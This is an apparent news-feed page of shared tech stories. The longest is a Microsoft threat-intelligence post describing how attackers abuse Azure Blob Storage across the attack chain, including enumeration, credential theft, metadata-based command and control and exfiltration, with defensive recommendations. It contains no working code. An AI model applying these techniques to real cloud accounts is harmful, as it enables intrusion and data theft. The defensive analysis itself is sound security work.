Sr. Content Developer at Microsoft, working remotely in PA, TechBash conference organizer, former Microsoft MVP, Husband, Dad and Geek.
147437 stories
·
32 followers

Trump DOE confirms it’s canceling over $700M in manufacturing grants

1 Share
The Department of Energy said it was canceling grants to build new factories in places like Alabama and Kentucky. Three startups are affected.
Read the whole story
alvinashcraft
3 hours ago
reply
Pennsylvania, USA
Share this story
Delete

Anthropic brings Claude Code to the web

1 Share
Anthropic now lets developers spin up Claude Code agents, and manage them, from their web browser on desktop and mobile.
Read the whole story
alvinashcraft
3 hours ago
reply
Pennsylvania, USA
Share this story
Delete

Inside the attack chain: Threat activity targeting Azure Blob Storage

1 Share

Azure Blob Storage, like any object data service, is a high-value target for threat actors due to its critical role in storing and managing massive amounts of unstructured data at scale across diverse workloads. Organizations of all sizes use Blob Storage to support key workloads—such as AI, high performance computing (HPC), analytics, media, enterprise backup, and IoT data ingestion—making it a potential vector for attacks that can impact everything from data integrity to business continuity. Threat actors are actively seeking opportunities to compromise environments that host downloadable media or maintain large-scale data repositories, leveraging the flexibility and scale of Blob Storage to target a broad spectrum of organizations.

Recognizing these risks, Microsoft’s Secure Future Initiative (SFI) has strengthened default security by design, but defenders must continue to follow security baseline recommendations and leverage customer-facing security capabilities to stay ahead of evolving threats. In alignment with the MITRE ATT&CK framework, Microsoft Threat Intelligence continually updates threat matrices to map the evolving tactics and techniques targeting cloud environments. While some of our previous work has focused on Kubernetes and containerized workloads at the compute layer of the cloud stack, this blog shifts the lens to the data storage layer—specifically, Azure Blob Storage.

Therefore, in this blog, we outline some of the unique threats associated with the data storage layer, including relevant stages of the attack chain for Blob Storage to connect these risks to actionable Azure Security controls and applicable security recommendations. We also provide threat detections to help contain and prevent Blob Storage threat activity with Microsoft Defender for Cloud’s Defender for Storage plan. By understanding the unique threats facing Azure Blob Storage and implementing targeted security controls, organizations can better safeguard their most critical workloads and data repositories against evolving attacker tactics.

How Azure Blob Storage works

Azure Storage supports a wide range of options for handling exabytes of blob data from many sources at scale. Blobs store everything from checkpoint and model files for AI to parquet datasets for analytics. These blobs are organized into containers, which function like folders grouping sets of blobs. A single storage account can contain an unlimited number of containers, and each container can store an unlimited number of blobs.

Blob Storage also supports HPC, backup, and disaster recovery scenarios for more resiliency and business continuity, like backing up on-premises resources or Infrastructure as a Service (IaaS) virtual machine-hosted SQL Server data. Azure Data Lake Storage offers specific optimizations well suited for file system and analytics workloads such as hierarchical namespace and fast atomic operations. Blob storage also supports public access scenarios such as download for static files—not all files are accessible for download over internet.

Azure Storage fulfils the cloud shared responsibility model through best practices across identity and access management, secure networking, data protection, and continuous monitoring. It supports best practices that help defend across the attack chain when implemented as part of both a cloud-native identity and access management solution such as Microsoft Entra ID, and a cloud-native application protection platform such as Defender for Cloud. Azure Storage integrates with both, allowing least-privilege access through Entra role-based access control (RBAC) and fine-grained Entra Azure attribute-based access control (ABAC).

Azure Storage safeguards data in transit with network protections such as network security perimeter, private endpoint/Private Link and virtual networks, and encryption for data in transit via TLS. It uses service-side encryption (SSE) to automatically encrypt all Azure Storage resources persisted to the cloud, including blobs and object metadata, and cannot be disabled. While Storage automatically encrypts all data in a storage account at the service level using 256-bit AES encryption (one of the strongest block ciphers available), it is also possible to enable 256-bit AES encryption at the infrastructure level for double encryption to protect against a scenario where one of the encryption algorithms or keys might be compromised.

Azure Storage integrates with Azure Backup and Microsoft Defender for ransomware and malware protection. Azure Storage also supports a wide range of data protection scenarios, such as preventing deletion or modification of accounts and blobs through immutability settings and enabling recovery from data deletion or overwrites through soft delete and versioning.  

A look at the attack chain

To help defenders apply appropriate controls and our recommendations against various threat scenarios across the attack chain, we take a closer look at the progression.

Attack techniques abusing Blob Storage spanning reconnaissance, resource development, initial access, persistence, execution, credential access, discovery, lateral movement, collection, command and control, exfiltration, and impact.
Figure 1. Attack techniques that abuse Blob Storage along the attack chain

Reconnaissance

Threat actors enumerate Blob Storage to identify publicly exposed data and credentials that they can leverage later in the attack chain. Common tactics include DNS and HTTP header probing to scan for valid *.blob.core.windows.net subdomains. Threat actors can now also use language models to generate plausible storage account or container names to make brute-forcing more effective.

Enumeration tools like Goblob have long been made available on GitHub, and threat actors can extend this type of capability misusing other tools on GitHub like QuickAZ, which combines storage enumeration with other Azure reconnaissance capabilities. Threat actors may also try to leverage PowerShell-based scanners easily accessible to brute-force prefix and suffix combinations for hours using permutation dictionary scripts. They can also turn to dedicated indexers cataloging tens of thousands of publicly exposed containers.  

When sensitive credentials, such as storage account keys, shared access signatures (SAS), or Microsoft Entra ID principal credentials are discovered in source code repositories or configuration files (including version histories), threat actors can more easily gain an initial foothold. Storage account keys are particularly high risk if they grant full read, write, and delete access to storage resources. With these credentials, threat actors can escalate privileges, move laterally, or proceed directly to exfiltrate data.

Resource development

Threat actors try to exploit misconfigured or missing identity controls to create malicious resources in Blob Storage in furtherance of their operations and targeting. They may attempt to leverage Azure Blob Storage to host spoofed versions of legitimate Microsoft sign-in pages to make it more challenging for potential victims to discern based on an inspection of the SSL certificates alone.

Threat actors may attempt to place malicious executables or macro-enabled documents in containers left open to anonymous access or secured by weak or compromised SAS. This could lead to victims downloading harmful content directly from those blob URLs.

Since Blob Storage often stores machine learning training datasets, threat actors may exploit it for data poisoning by injecting mislabeled or malicious samples to skew model behavior and produce incorrect predictions.

Initial access

A single misconfigured endpoint could expose sensitive information. Theoretically, a threat actor could attempt to exploit blob-triggered Azure Functions using Event Grid that process files in storage containers, or Azure Logic Apps that automate file transfers from external sources like FTP servers, to gain entry to downstream workflows linked to Azure Storage—if those workflows rely on misconfigured or insufficiently secured authentication mechanisms. This could allow an attacker to maliciously trigger trusted automation or hijack event routing to escalate privileges or move laterally within the environment.

Persistence

If a threat actor gains access to an environment through Blob Storage, they may attempt to establish a long-term foothold by manipulating identity and access configurations that are resilient to standard remediation efforts such as key rotations or password resets. These techniques may include assigning built-in roles or custom roles with elevated privileges to identities under their control, generating SAS with broad permissions and extended expiration periods, modifying container-level access policies to permit anonymous read access, enabling Secure File Transfer Protocol (SFTP) on storage accounts, or leveraging soft-delete capabilities to conceal malicious payloads by uploading, deleting, and later restoring blobs.

Threat actors frequently abuse legitimate tools such as AADInternals to establish backdoors and persist, enabling access to both cloud and hybrid resources. Additionally, frameworks like AzureHound are extensively leveraged to identify privileged escalation paths from enumerated Azure resources.

Defense evasion

Threat actors may attempt to evade detection by tampering with Blob Storage networking and logging configurations—loosening or deleting firewall rules, adding overly permissive IP address ranges or virtual network (VNet) rules, creating unauthorized private endpoints, distributing requests across regions, or disabling diagnostic logging.

Credential access

Threat actors may attempt to obtain Blob Storage credentials through several vectors, including token and key extraction, cloud shell persistence abuse, and exposure through misconfigurations. For token and key extraction, threat actors with access to Entra ID tokens may reuse refresh tokens to obtain new access tokens, or invoke privileged management APIs (for example, listKeys) to extract primary and secondary storage account keys. These keys may grant full data-plane access and bypass identity-based controls. For cloud shell persistence abuse, because Azure Cloud Shell stores session data within a hidden blob container within the user’s storage account, threat actors with access may retrieve cached credentials, command history, or configuration files containing sensitive information. Finally, for exposure through misconfiguration, if secure transfer is not enforced or network access controls are overly permissive, shared keys or SAS tokens may be exposed in transit or through public endpoints. This includes keys and tokens found in exposed or compromised endpoints or code-repositories. These credentials can then possibly be reused by threat actors to access or exfiltrate data.

Discovery

After gaining a foothold in Azure, threat actors might map Blob Storage to locate valuable data and understand defensive settings. To uncover blob containers unintentionally exposed publicly, they could enumerate the broader cloud estate—querying subscriptions, resource groups, and storage account inventories. After identifying accounts, threat actors could probe deeper: listing containers and blobs, inspecting metadata, and retrieving configuration details such as firewall rules, logging targets, immutability policies, and backup schedules. This would enable them to identify where sensitive data resides and assess which controls can be bypassed or disabled to facilitate collection, exfiltration, or destruction.

Lateral movement

When a new blob is added to a container, Azure can trigger Azure Functions, Logic Apps, or other workflows. If a threat actor controls the source container and an Event Grid subscription is configured, they may upload specially crafted files that trigger downstream compute resources running under managed identities, which may have elevated permissions to move laterally into other services.

If Azure Functions store their code in Azure Storage and threat actors gain write access, they may attempt to replace the code with malicious files. When the function is triggered by a blob event, HTTP request or timer, it could run malicious code under the function’s identity, potentially granting access to other resources.

Threat actors may also target automated data pipelines or third-party integrations that trust blob-based inputs. Enterprises often use Azure Data Factory and Azure Synapse Analytics to copy and transform data from Azure Blob Storage. These pipelines typically authenticate to Blob using managed identities, service principals, SAS tokens, or account keys, and may connect over managed private endpoints. If an attacker can modify data in a source container, they may influence downstream processing or gain access to services that trust the pipeline’s identity, enabling further lateral movement.

Collection

If blob containers are misconfigured, threat actors may be able to list and download large volumes of data directly from storage. If access is obtained, they may copy or export sensitive files into a staging container they control, using Storage operations like StartCopySyncCopy, or CopyBlob through AzCopy or the Azure Storage REST API to stay within Azure and evade detection. They may compress or encrypt the data cache internally as well before attempting to exfiltrate it.

Command and control

Blob Storage can be abused to distribute malware if the account or credentials are compromised. Threat actors may try to use Blob Storage as a covert beacon channel, where malware running on compromised hosts periodically polls for new blobs or metadata updates containing command payloads. After infecting a target, malware might send HEAD or GET requests to the Azure blob’s REST API, retrieving metadata without downloading the file content. If malware parses these headers as communication channels, it may send exfiltrated data back by writing separate metadata updates. Threat actors could embed new commands within metadata fields, meaning the blob’s content remains unchanged while the metadata plane acts as a persistent, stealthy command-and-control (C2) server. 

Additionally, threat actors may attempt to exploit object replication to propagate payloads across environments. If a replication policy is successfully configured, any new blobs added to a compromised source container are automatically copied to a trusted destination container—turning it into a distribution hub and enabling supply chain–style attacks.

Exfiltration

If threat actors gain access to the environment, they might leverage Azure-native tools like Azure Storage Explorer or AzCopy to exfiltrate data at scale—exploiting Azure’s high bandwidth and trusted domains to evade detection. 

For instance, they could enable static website hosting and copy sensitive blobs into the publicly accessible $web container. Disabling anonymous access on the storage account-level offers no protection here, because the $web container always remains publicly accessible. In another scenario, threat actors could exfiltrate data into a separate Azure subscription they control, using Microsoft’s internal network as a covert transport layer to bypass controls. 

Threat actors could also embed exfiltration logic within Azure Functions, Logic Apps, or Automation runbooks, disguising them as legitimate maintenance tasks and throttling transfers to stay below volume or rate thresholds.

Third-party integrations can also lead to indirect exposure if the integrated products are compromised. For example, in 2023, defenders whose environments had MOVEit Transfer application connected to Blob Storage for file transfers or archiving partially contained a zero-day vulnerability, which was later attributed in a tweet by Microsoft to Lace Tempest (known for ransomware operations and running the Clop extortion site).

Impact

If threat actors obtain high privilege roles, storage account keys, or broadly scoped SAS tokens, they can cause extensive damage—for example, issuing mass DeleteBlob or DeleteContainer operations, overwriting objects including with empty content, or re-encrypting data by reuploading modified content or writing new content to blobs. With the necessary privileges, threat actors can also modify file contents or metadata, change access tiers, and remove legal holds. In many scenarios, simply reading or exfiltrating data can result in long-term impact, even without immediate disruption—such as in cases of espionage.

Recommendations

Microsoft recommends the following mitigations to reduce the impact of this threat. 

Apply zero trust principles to Azure Storage.

Business asset security depends on the integrity of the privileged accounts that administer your IT systems. Refer to our FAQ for answers on securing privileged access. Learn to enable the Azure identity management and access control security best practices, such as ensuring separate user accounts and mail forwarding for Global Administrator accounts. Follow best practices for using Microsoft Entra role-based access control.

Implement our security recommendations for Blob Storage.

Monitor the Azure security baseline for Storage and its recommendations using Defender for Cloud.

Microsoft Defender for Cloud periodically analyzes the security state of your Azure resources to identify potential security vulnerabilities and then provides security recommendations on how to address them. For more information, see Review your security recommendations.

Enable Microsoft Defender for Storage.

Defender for Storage provides an additional layer of security intelligence that detects unusual and potentially harmful attempts to access or exploit storage accounts. Its alerts detect and prevent top cloud storage threats, including sensitive data exfiltration, data corruption, and malicious file uploads. For more information, see Understand security threats and alerts in Microsoft Defender for Storage.

You don’t need to enable diagnostic logs for analysis. Defender for Storage also detects suspicious activities from entities without identities that access your data using misconfigured and overly permissive SAS. These SAS might be leaked or compromised.

Sensitive data threat detection considers the sensitivity of the data at risk, quickly identifying and addressing the most significant risks. It also detects exposure events and suspicious activities on resources containing sensitive data. Learn more about sensitive data threat detection.

Enable Defender for Storage via built-in policy. Monitor compliance states to detect if an attacker attempts to tamper with Defender for Storage to evade defenses, and automatically respond with alerts and recovery tasks.

Malware scanning in Defender for Storage detects in near real-time and mitigates a wide variety of malware threats either by scanning blobs automatically when blobs are being frequently uploaded or modified, or on-demand for proactive security, incident response, integrating partner data, and securing data pipelines and machine learning datasets.

You can store scan results using index tags, which can be used by applications to automate workflows. Microsoft Defender for Cloud also generates relevant security alerts in the portal, so you can configure automations or export them to Microsoft Sentinel or another SIEM. You can also send results to an Event Grid for automating response and create an audit trail with Log Analytics.

Scanning supports automated remediation through built-in soft deletion of malicious blobs discovered during scanning, blocking access, quarantining and forwarding clean files.

Enable Defender Cloud Security Posture Management (CSPM).

Enabling the CSPM plan extends CSPM capabilities that are automatically enabled as part of Defender for Cloud to offer extra protections for your environment such as cloud security explorer, attack path analysis, and agentless scanning for machines.  

The Sensitive data discovery component of CSPM identifies sensitive resources and their related risks, then helps prioritize and remediate those risks using the Microsoft Purview classification engine.

Use the cloud security checklist as a structured approach for securing your Azure cloud estate.

This checklist provides security guidance for those managing the technology infrastructure that supports all the workload development and operations hosted on Azure. To help ensure your workloads are secure and aligned with the Zero Trust model, use the design review checklist for security. We also provide complementary guidance on applying security practices and DevSecOps controls in a security development lifecycle.

Enable threat protection for AI services.

Blob Storage is often used to store training datasets for Azure Machine Learning. Because data poisoning is among the most severe machine learning threats, it is critical to scan uploads before they ever enter your pipeline to prevent targeted poisoning attacks.

Microsoft Defender XDR detections

Microsoft Defender for Cloud

When Defender for Storage is enabled, the following alerts in Defender for Cloud may indicate Azure Blob Storage threat activity. Note that other alerts apply to Azure Files.

Some of these alerts will not work if sensitive data threat detection is disabled. Some alerts may be relevant to secondary stages of the attack chain or only be an indication of a penetration test in your organization.

Reconnaissance
Resource Development
Initial Access
Discovery
Lateral Movement
Collection
Command and control
Exfiltration
Impact

Threat intelligence reports

Microsoft customers can use the following reports in Microsoft products to get the most up-to-date information about the threat actor, malicious activity, and techniques discussed in this blog. These reports provide the intelligence, protection information, and recommended actions to prevent, mitigate, or respond to associated threats found in customer environments.

Microsoft Defender Threat Intelligence

Microsoft Security Copilot

Security Copilot customers can use the standalone experience to create their own prompts or run the following pre-built promptbooks to automate incident response or investigation tasks related to this threat:

  • Incident investigation
  • Microsoft User analysis
  • Threat actor profile
  • Threat Intelligence 360 report based on MDTI article
  • Vulnerability impact assessment

Note that some promptbooks require access to Microsoft plugins such as for either Microsoft Defender XDR or Microsoft Sentinel.

MITRE ATT&CK Techniques observed

This threat exhibits the use of the following attack techniques. For standard industry documentation about these techniques, refer to the MITRE ATT&CK framework.

Reconnaissance

T1593.002 Search Open Websites/Domains: Search Engines | Threat actors may use search engines and advanced querying (for example, site:*.blob.core.windows.net) to discover exposed Blob Storage accounts.

T1594 Search Victim-Owned Websites | Threat actors might look for storage accounts of a victim enterprise by searching its websites. Victim-owned website pages might be stored on a storage account or contain links to retrieve data stored in a storage account. The links contain the URL of the storage and provide an entry point into the account.

T1595.003 Active Scanning: Wordlist Scanning | Threat actors might attempt to locate publicly accessible cloud storage accounts or containers by iteratively trying different permutations or using target-specific wordlists to discover storage endpoints that can be probed for vulnerabilities or misconfigurations.

T1596 Search Open Technical Databases | Threat actors might search public databases for publicly available storage accounts that can be used during targeting.

T1596.001 Search Open Technical Databases: DNS/Passive DNS | Threat actors might search for DNS data for valid storage account names that could become potential targets by querying nameservers using brute-force techniques to enumerate existing storage accounts in the wild or searching through centralized repositories of DNS query responses.

Resource Development

T1583.004 Acquire Infrastructure: Server | If threat actors exploit weak or misconfigured identity controls, Blob Storage could be misused as attacker-controlled infrastructure for hosting malicious payloads, phishing, or C2 scripts.

Initial Access

T1566.001 Phishing: Spearphishing Attachment | Blob Storage could host malicious attachments for spear phishing if threat actors leverage compromised SAS tokens or misconfigured anonymous access.

T1566.002 Phishing: Spearphishing Link | Blob Storage could be misused as a publicly accessible host for spear-phishing links if anonymous or misconfigured containers exist.

T1078.004 Valid Accounts: Cloud Accounts | Threat actors could gain an account-like foothold in Blob Storage if they compromise SAS or storage account keys or successfully take control of a Microsoft Entra ID principal account that holds roles or permissions over Blob Storage. 

Persistence

T1098.001 Account Manipulation: Additional Cloud Credentials | To maintain access even if compromised credentials are revoked, threat actors may try to exploit Blob Storage’s Role-Based Access Control (RBAC) by modifying permissions on identity objects, like Microsoft Entra ID security principals. They may also create high-privilege SAS tokens with long expiry, modify container access levels to allow anonymous reads, or provision SFTP accounts that bypass key rotation.

Defense Evasion

T1562.011 Impair Defenses: Disable or Modify Tools | Threat actors can try to disable, suppress, or modify Defender for Storage scanning features.

T1562.007 Impair Defenses: Disable or Modify Cloud Firewall | Threat actors may try to disable, modify, or reconfigure Blob Storage’s firewall and virtual network rules—such as by granting exceptions for trusted services through managed identities, establishing private endpoints, or leveraging geo-replication—to mask access channels and maintain persistent, covert access even if primary credentials are revoked. 

Credential Access

T1528 Steal Application Access Token | Threat actors may compromise Blob Storage by stealing OAuth-based application access tokens (including refresh tokens) or by leveraging subscription-level privileges to query management APIs and extract primary and secondary storage account keys. While compromised tokens enable impersonation of legitimate users with constrained, renewable privileges, keys grant unrestricted data-plane access that bypasses identity-based controls. Possession of either credential type can lead to full access to blob containers, facilitating data compromise and lateral movement across the cloud environment.

T1003 OS Credential Dumping | Threat actors might dump Cloud Shell profiles and session history—stored in blob containers of an Azure Storage account—to extract sensitive credentials such as OAuth tokens, API keys, or other authentication secrets. While these credentials differ from traditional OS password hashes, their extraction is analogous to conventional credential dumping because threat actors can use them to impersonate legitimate users and gain unauthorized, persistent access to Blob Storage, facilitating lateral movement and data compromise.

T1040 Network Sniffing | Threat actors might passively intercept network traffic destined for Blob Storage when unencrypted protocols are allowed, exposing shared keys, SAS tokens, or API tokens that could then be used to gain unauthorized access to the blob data plane. By exploiting cloud-native traffic mirroring tools, a threat actor could intercept and analyze the network data flowing to and from the virtual machines interacting with Blob Storage.

Discovery

T1580 Cloud Infrastructure Discovery | Blob Storage could be enumerated post-compromise to list subscriptions, resource groups, or container names that are not externally visible.

T1619 Cloud Storage Object Discovery | Blob Storage could be enumerated post-compromise to find specific blob data and configuration details, such as by call listing APIs to inventory objects or use control-plane access to retrieve firewall rules, logging, and backup policies.

Lateral Movement

T1021.007 Remote Services: Cloud Services | Threat actors might manipulate Blob Storage to trigger a compute service, such as Azure Functions, after placing a malicious blob in a monitored container. This automatic execution chain lets attackers pivot from the compromised container to the compute resource, potentially infiltrating additional components.

Collection

T1074.002 Data Staged: Remote Data Staging | Blob Storage could be used as a “staging area” if permissions are overly broad.

T1530 Data from Cloud Storage Object | Blob Storage could be abused to retrieve or copy data directly from containers if they are misconfigured, publicly accessible, or if keys or SAS tokens are obtained. This might include selectively downloading stored files.

Command and Control

T1105 Ingress Tool Transfer | Threat actors might upload and store malicious programs or scripts in Blob Storage after compromising the storage account or its credentials, leverage automatic synchronization to “fan out” malicious payloads across hosts that regularly pull from blob containers, and facilitate ongoing C2 to enable additional compromise and lateral movement. By merging malicious uploads with normal blob usage, threat actors could stealthily distribute harmful tools to multiple hosts simultaneously, reinforcing both C2 and lateral movement.

Exfiltration

T1567.002 Exfiltration Over Web Service: Exfiltration to Cloud Storage | Blob Storage may facilitate data exfiltration if permissions are overly permissive or credentials (for example, account keys, SAS tokens) are compromised. Threat actors may abuse the “static website” feature to expose blob containers through public web endpoints or use tools like AzCopy to transfer stolen data.

T1030 Data Transfer Size Limits | A threat actor might deliberately constrain the packet sizes of Blob Storage data to remain below established thresholds by transferring it in fixed-size chunks rather than as entire blobs.

T1020 Automated Exfiltration | Threat actors might embed exfiltration routines in predefined automation processes in Blob Storage to evade detection.

T1537 Transfer Data to Cloud Account | Threat actors might transfer Blob Storage data to another cloud account that is under their control by using internal APIs and network paths that evade detection mechanisms focused on external data transfers.

Impact

T1485 Data Destruction | Blob Storage could be compromised or misused for data destruction, where a threat actor deletes or overwrites blob data for impact.

T1486 Data Encrypted for Impact | Blob Storage could be targeted by ransomware if threat actors obtain privileged access or compromise keys.

T1565 Data Manipulation | Threat actors might insert, delete, or modify Blob Storage data to compromise data integrity and influence outcomes by altering blob contents or metadata, disrupting business processes, distorting organizational insights, or concealing malicious activities.

References

Learn more

For the latest security research from the Microsoft Threat Intelligence community, check out the Microsoft Threat Intelligence Blog.

To get notified about new publications and to join discussions on social media, follow us on LinkedIn, X (formerly Twitter), and Bluesky.

To hear stories and insights from the Microsoft Threat Intelligence community about the ever-evolving threat landscape, listen to the Microsoft Threat Intelligence podcast.

The post Inside the attack chain: Threat activity targeting Azure Blob Storage appeared first on Microsoft Security Blog.

Read the whole story
alvinashcraft
3 hours ago
reply
Pennsylvania, USA
Share this story
Delete

Windows Shell Previews – Restricted

1 Share

Windows users who installed the October 2025 Security Updates may have noticed an unexpected change if they use the Windows Explorer preview pane. When previewing a downloaded PDF file, the preview is now replaced with the following text:

Explorer Preview: “The file you are attempting to preview could harm your computer.”

While it also occurs when viewing files on remote Internet Zone file shares, the problem doesn’t occur for other files on your local disk, for remote shares in your Trusted or Intranet zone, or if you manually remove the Mark-of-the-Web from the file (although Explorer seems to cache it, so you have to restart Explorer to see the change 😬).

What happened?

The change in Windows was a trivial one: the value for URLACTION_SHELL_PREVIEW (0x180f) in the Internet Zone (3) was changed from Enabled (0) to Disable (3):

For decades, before Windows Explorer has asked previewers to show a preview for a file, it consults the SHELL_PREVIEW URLAction to see whether the file’s location allows previews. With this settings change, the permission to show previews is now gone for files that originate from the Internet Zone.

Why?

The reason is a simple one that we’ve covered before: the risk of leaking NTLM credential hashes to the Internet when retrieving resources via SMB via the file: protocol. As we discussed in the post on File Restrictions, browsers restrict use of the file protocol to files that are opened by the file protocol. When you preview a downloaded file in Explorer, the URL to that download uses file: and thus the previewer is allowed to request file: URLs, potentially leaking hashes when the file is previewed. With this change, the threat is blunted because with the previews disabled, you’d have to actually open the downloaded file to leak a hash.

Unfortunately, this fix is a blunt instrument: while HTML files can trivially reference subresources, other file types like PDF files typically cannot (we disable PDF scripting in Explorer previews) but are blocked anyway.

If you like, you can revert this change on your own PC by resetting the registry key (or by adding download shares you trust to your Trusted Sites Zone). However, keep in mind that doing so reenables the threat vector, so you’ll want to make sure you have another compensating control in place: for example, disabling NTLM over SMB, and/or configuring your gateway/firewall to block SMB traffic.

-Eric



Read the whole story
alvinashcraft
3 hours ago
reply
Pennsylvania, USA
Share this story
Delete

AWS Weekly Roundup: Kiro waitlist, EBS Volume Clones, EC2 Capacity Manager, and more (October 20, 2025)

1 Share

I’ve been inspired by all the activities that tech communities around the world have been hosting and participating in throughout the year. Here in the southern hemisphere we’re starting to dream about our upcoming summer breaks and closing out on some of the activities we’ve initiated this year. The tech community in South Africa is participating in Amazon Q Developer coding challenges that my colleagues and I are hosting throughout this month as a fun way to wind down activities for the year. The first one was hosted in Johannesburg last Friday with Durban and Cape Town coming up next.

Last week’s launches
These are the launches from last week that caught my attention:

Additional updates
I thought these projects, blog posts, and news items were also interesting:

Upcoming AWS events
Keep a look out and be sure to sign up for these upcoming events:

AWS re:Invent 2025 (December 1-5, 2025, Las Vegas) — AWS flagship annual conference offering collaborative innovation through peer-to-peer learning, expert-led discussions, and invaluable networking opportunities.

Join the AWS Builder Center to learn, build, and connect with builders in the AWS community. Browse here for upcoming in-person and virtual developer-focused events.

That’s all for this week. Check back next Monday for another Weekly Roundup!

Veliswa.

Read the whole story
alvinashcraft
3 hours ago
reply
Pennsylvania, USA
Share this story
Delete

MCP vs. API Gateways: They’re Not Interchangeable

1 Share
Modern neon illuminated gateway with archways.

The organizations I work with are rapidly adopting the Model Context Protocol (MCP) to connect their services and data to AI models through AI agents, but they’re running into familiar challenges: securing access to MCP servers and tools while providing routing, rate limiting, observability and developer portals.

The early days of API adoption taught us painful lessons about security breaches, performance disasters and operational chaos when services were exposed without proper gateway controls.

If you’re building and exposing MCP servers in your enterprise, you’re probably asking the question I hear all the time: “Can we just use our existing API gateway for MCP?”

The short answer is “maybe,” but the real question is should you? API gateways were not built for the MCP use cases. In fact, eventually most API gateway vendors will build dedicated MCP gateways.

Let’s explore the fundamental paradigm difference between APIs and MCP and why the existing infrastructure (API gateway) must evolve.

APIs Are Stateless, MCP Is Stateful

Before we dig into what the infrastructure should do, we need to understand the obvious differences between these two approaches. APIs are “stateless” services that operate on each request individually in isolation. REST APIs heavily use the underlying transport (HTTP) for the semantics of the protocol. What this means, practically, is that all the information needed to route, authorize and enforce policy in an API gateway lives in the HTTP headers and URL structure.

Your API gateway can make intelligent decisions by examining:

  • Method (GET, POST, PUT, DELETE)
  • Path (/users/123/orders)
  • Headers (Authorization: Bearer xyz, Content-Type)
  • Query parameters (?limit=10&offset=50)

The API gateway rarely operates on the request body. If it does, it’s to do some minor transformations or pull pieces out into headers or metadata that can be used for routing. The body typically follows a predictable schema (such as Open API Spec) that can be validated and transformed using straightforward mapping rules when needed. Most importantly, each request stands alone. There’s no session state to maintain between calls.

Remote MCP servers flip this model completely on its head. First, an MCP client will connect to an MCP server with an “initialize” message and negotiate various protocol settings. Second, the server assigns a session ID (like Mcp-Session-Id) that can be used to coordinate all subsequent interactions for that client. This session maintains critical context/state, including:

  • Protocol capabilities negotiated between client and server (which optional features are available).
  • Tool result/context from previous tool calls and responses.
  • Asynchronous tool call state; streaming updates/notifications.
  • State about requested information from the server to the client.

Unlike REST APIs, where each request carries complete context in headers, MCP requests contain minimal routing information in the HTTP layer. The entire protocol is in the body of the HTTP request. A typical MCP request looks like this:

POST /mcp
Mcp-Session-Id: session_abc123
Content-Type: application/json

{
  "jsonrpc": "2.0", 
  "method": "tools/call",
  "params": { 
    "name": "database_query",
    "arguments": { /* complex nested structure */ }
  },
  "id": "call_456"
}


Everything meaningful lives in the JSON-RPC body: the method type, the specific tool being called and the parameters. The HTTP layer is just a “dumb” transport.

Even more challenging, MCP servers can initiate communication back to clients through Server-Sent Events (SSE), sending progress updates, streaming results or even new requests (elicitations, sampling, etc.). This bidirectional, session-aware communication pattern is fundamentally different from the request-response model that API gateways were designed around.

Can You Use Your API Gateway as an MCP Gateway?

As we can see, there are fundamental differences between the two models. But there are similarities, right? They’re both over HTTP. We can apply JWT/token/OAuth-style security. And it’s not a stretch that API gateways can operate on a request body. So, can you use your API gateway to govern your MCP services?

Here’s a nonexhaustive list of what you MAY need your API gateway to do:

  • Parse request body and responses (JSON-RPC), implement protocol semantics.
  • Inject policy decisions (allow/deny) on pieces of the body (tool lists, tool calls, resource requests, etc.).
  • A single HTTP POST from an MCP client can result in multiple responses, streamed back (SSE).
  • Need a way to inject policy enforcement in the stream.
  • Once the stream is established, proxy requests from MCP server to MCP client.
  • Broker differences between MCP clients and MCP servers.
  • Present a single logical MCP server to an MCP client (virtual MCP server), which may be multiple MCP servers in the backend.

An API gateway can do some of this, so let’s look at the common MCP gateway patterns from simple to more complex:

  • Simple passthrough proxy
  • Partial protocol understanding
  • MCP brokering
  • MCP multiplexing

Simple Passthrough Proxy

At the most basic level, your API gateway can act as a passthrough proxy for MCP traffic. In this scenario, the gateway treats MCP requests like any other HTTP POST with a JSON payload. It doesn’t understand the JSON-RPC structure or MCP semantics, but it can still provide some value:

What Works Well:

  • HTTP-level authentication (API keys, OAuth tokens)
  • Basic rate limiting per client or IP
  • Transport Layer Security (TLS) termination and certificate management
  • Request/response logging and metrics

For example, you may want to check that a JWT is included in the HTTP Authorization header and validate the JWT against a trusted IdP. This is basic HTTP handling, and any API gateway can do this. What happens if the response is an SSE stream? Luckily, most modern API gateways can also return a stream of events. If we want to implement some policy on the response (for example, what tools a client can see), then we need to understand the SSE events. A simple passthrough proxy approach wouldn’t allow us to do that.

Gateway Limitations With SSE:

  • No streaming policy enforcement: The gateway can’t inspect or filter individual SSE events.
  • Limited observability: Can’t track progress, detect errors or measure per-event latency.
  • No midstream authorization: Can’t revoke access or apply policies as the stream progresses.
  • Session context lost: Multiple SSE events are part of one logical MCP operation, but the gateway sees them as independent chunks.

Think of it like putting a generic reverse proxy in front of a database. You get connection pooling and basic monitoring, but no query-level insights or policies. The moment you need to understand what’s flowing through the proxy, you’ve outgrown this approach.

Partial Protocol Support

Here’s where things get interesting (and complex). With enough custom development, you can teach your API gateway to parse MCP JSON-RPC payloads and extract meaningful information for policy decisions. Most API gateways support custom body parsing through JavaScript/Lua/template policies or similar scripting mechanisms. For example, in Apigee, you can call out to a JavaScript extension policy to implement custom parsing and policy.

What Becomes Possible:

  • Better understanding of JSON-RPC requests.
  • Apply tool-level authorization (“marketing users can’t call database_query”).
  • Basic request transformation and validation.

The painful reality: This approach quickly becomes brittle and expensive to maintain:

  • Dynamic parsing complexity: MCP tool lists have arbitrary tool lengths. Your JSONPath expressions become increasingly complex and fragile.
  • Performance overhead: JavaScript policies are slower than native gateway policies.
  • Maintenance burden: Every new MCP tool may require updating gateway policies. Your infrastructure team becomes coupled to your MCP server development.
  • Limited streaming support: While some gateways support SSEs, applying policy midstream becomes exponentially more complex.

What happens in practice is you end up building a gateway on top of an existing gateway and fight to try and implement new features or squeeze out performance improvements.

MCP Brokering

MCP brokering involves the gateway actively participating in the MCP protocol conversation, not just proxying requests, but potentially modifying, filtering or enhancing them based on policy decisions. For example, an MCP client can connect to the MCP gateway with one version of the MCP protocol, and the MCP gateway can mediate/broker to a different version. A capability like this is critical in enterprise environments where it may be impossible to make updates to all MCP clients all at once when an MCP server updates to a new version of the protocol.

Additional brokering use cases build on the previous pattern:

  • Version shielding: Shielding an MCP client from breaking changes when performing an MCP server upgrade.
  • Request filtering: Remove tools from discovery responses based on backward compatibility requirements.
  • Response sanitization: Strip sensitive data from tool responses based on user clearance levels.
  • Context injection: Add enterprise context (user ID, tenant info) to tool calls.
  • Error handling: Convert MCP protocol errors into enterprise-compliant audit events.

